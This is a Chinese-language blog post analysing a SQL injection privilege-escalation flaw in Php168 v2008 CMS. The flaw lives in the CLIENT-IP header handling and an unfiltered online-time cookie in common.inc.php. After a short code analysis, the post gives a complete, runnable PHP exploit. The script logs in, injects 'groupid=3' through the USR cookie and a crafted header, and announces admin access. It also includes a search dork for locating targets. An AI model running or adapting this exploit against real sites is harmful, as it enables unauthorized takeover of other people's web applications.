Php168 v2008 权限提升漏洞利用工具代码exploit

简单分析下这个 Php168 v2008 权限提升漏洞利用工具代码exploit：

common.inc.php

1
if($_SERVER['HTTP_CLIENT_IP']){
2
     $onlineip=$_SERVER['HTTP_CLIENT_IP'];
3
}elseif($_SERVER['HTTP_X_FORWARDED_FOR']){
4
     $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR'];
5
}else{
6
     $onlineip=$_SERVER['REMOTE_ADDR'];
7
}
8
$onlineip = preg_replace("/^([d.]+).*/", "\1", filtrate($onlineip));

//这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip 看一下filtrate函数是怎么处理的

function.inc.php

function filtrate($msg){ $msg = str_replace(’&’,’&’,$msg); $msg = str_replace(’ ’,’ ’,$msg); $msg = str_replace(’”’,’”’,$msg); $msg = str_replace(”’”,''',$msg); $msg = str_replace(”<”,”<”,$msg); $msg = str_replace(”>”,”>”,$msg); $msg = str_replace(” ”,” ”,$msg); $msg = str_replace(” ”,"",$msg); $msg = str_replace(” ”,” ”,$msg); return $msg; }

过滤了’“<等,但是没有处理

common.inc.php

1
    if($usr_oltime>30||!$usr_oltime){
2
        $usr_oltime>600 && $usr_oltime=600;
3
        include(PHP168_PATH."php168/level.php");
4
        if( isset($memberlevel[$lfjdb[groupid]]) ){
5
            $SQL=",groupid=8";
6
            $lfjdb[money]=get_money($lfjuid);
7
            foreach( $memberlevel AS $key=>$value){
8
                if($lfjdb[money]>=$value){
9
                    $SQL=",groupid=$key";
10
                }
11
            }
12
        }else{
13
            $SQL="";
14
        }
15
        $db->query("UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='$onlineip',oltime=oltime+'$usr_oltime'$SQL WHERE uid='$lfjuid'");
3 collapsed lines
16
//因为这个地方是拼接字符串的形式,所以可以使用来转义',然后利用$usr_oltime来注射:)另外要注意的是$usr_oltime有一个简单的判断的,而且还要保证sql语句的语法正确,看下我构造的语句:
17

18
UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[]',oltime=oltime+'[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]'$SQL WHERE uid='$lfjuid'

最后给出 Php168 v2008 权限提升漏洞利用工具代码exploit：

1
#!/usr/bin/php
2
<?php
3

4
print_r('
5
+---------------------------------------------------------------------------+
6
[Php168 <= v2008 update user access exploit](/blog/php168-v2008-update-user-access-exploit)
7
by puret_t
8
mail: puretot at gmail dot com
9
team: http://www.wolvez.org
10
dork: "Powered by PHP168"
11
+---------------------------------------------------------------------------+
12
');
13
/**
14
 * works regardless of php.ini settings
15
 */
112 collapsed lines
16
if ($argc < 5) {
17
    print_r('
18
+---------------------------------------------------------------------------+
19
Usage: php '.$argv[0].' host path user pass
20
host:      target server (ip/hostname)
21
path:      path to php168
22
user:      login username
23
pass:      login password
24
Example:
25
php '.$argv[0].' localhost /php168/
26
+---------------------------------------------------------------------------+
27
');
28
    exit;
29
}
30

31
error_reporting(7);
32
ini_set('max_execution_time', 0);
33

34
$host = $argv[1];
35
$path = $argv[2];
36
$user = $argv[3];
37
$pass = $argv[4];
38

39
$resp = send();
40
preg_match('/Set-Cookie:s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);
41

42
if ($cookie)
43
    if (strpos(send(), 'puret_t') !== false)
44
        exit("Expoilt Success!
45
You Are Admin Now!
46
");
47
    else
48
        exit("Exploit Failed!
49
");
50
else
51
    exit("Exploit Failed!
52
");
53

54
function rands($length = 8)
55
{
56
    $hash = '';
57
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
58
    $max = strlen($chars) - 1;
59
    mt_srand((double)microtime() * 1000000);
60
    for ($i = 0; $i < $length; $i++)
61
        $hash .= $chars[mt_rand(0, $max)];
62

63
    return $hash;
64
}
65

66
function send()
67
{
68
    global $host, $path, $user, $pass, $cookie;
69

70
    if ($cookie) {
71
        $cookie[1] .= ';USR='.rands()." %2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]# ";
72
        $cmd = '';
73

74
        $message = "POST ".$path."member/userinfo.php  HTTP/1.1
75
";
76
        $message .= "Accept: */*
77
";
78
        $message .= "Accept-Language: zh-cn
79
";
80
        $message .= "Content-Type: application/x-www-form-urlencoded
81
";
82
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)
83
";
84
        $message .= "CLIENT-IP: ryat\
85
";
86
        $message .= "Host: $host
87
";
88
        $message .= "Content-Length: ".strlen($cmd)."
89
";
90
        $message .= "Connection: Close
91
";
92
        $message .= "Cookie: ".$cookie[1]."
93
";
94
        $message .= $cmd;
95
    } else {
96
        $cmd = "username=$user&password=$pass&step=2";
97

98
        $message = "POST ".$path."login.php  HTTP/1.1
99
";
100
        $message .= "Accept: */*
101
";
102
        $message .= "Accept-Language: zh-cn
103
";
104
        $message .= "Content-Type: application/x-www-form-urlencoded
105
";
106
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)
107
";
108
        $message .= "Host: $host
109
";
110
        $message .= "Content-Length: ".strlen($cmd)."
111
";
112
        $message .= "Connection: Close
113
";
114
        $message .= $cmd;
115
    }
116

117
    $fp = fsockopen($host, 80);
118
    fputs($fp, $message);
119

120
    $resp = '';
121

122
    while ($fp && !feof($fp))
123
        $resp .= fread($fp, 1024);
124

125
    return $resp;
126
}
127
?>

by Ryat http://www.wolvez.org 2009-01-25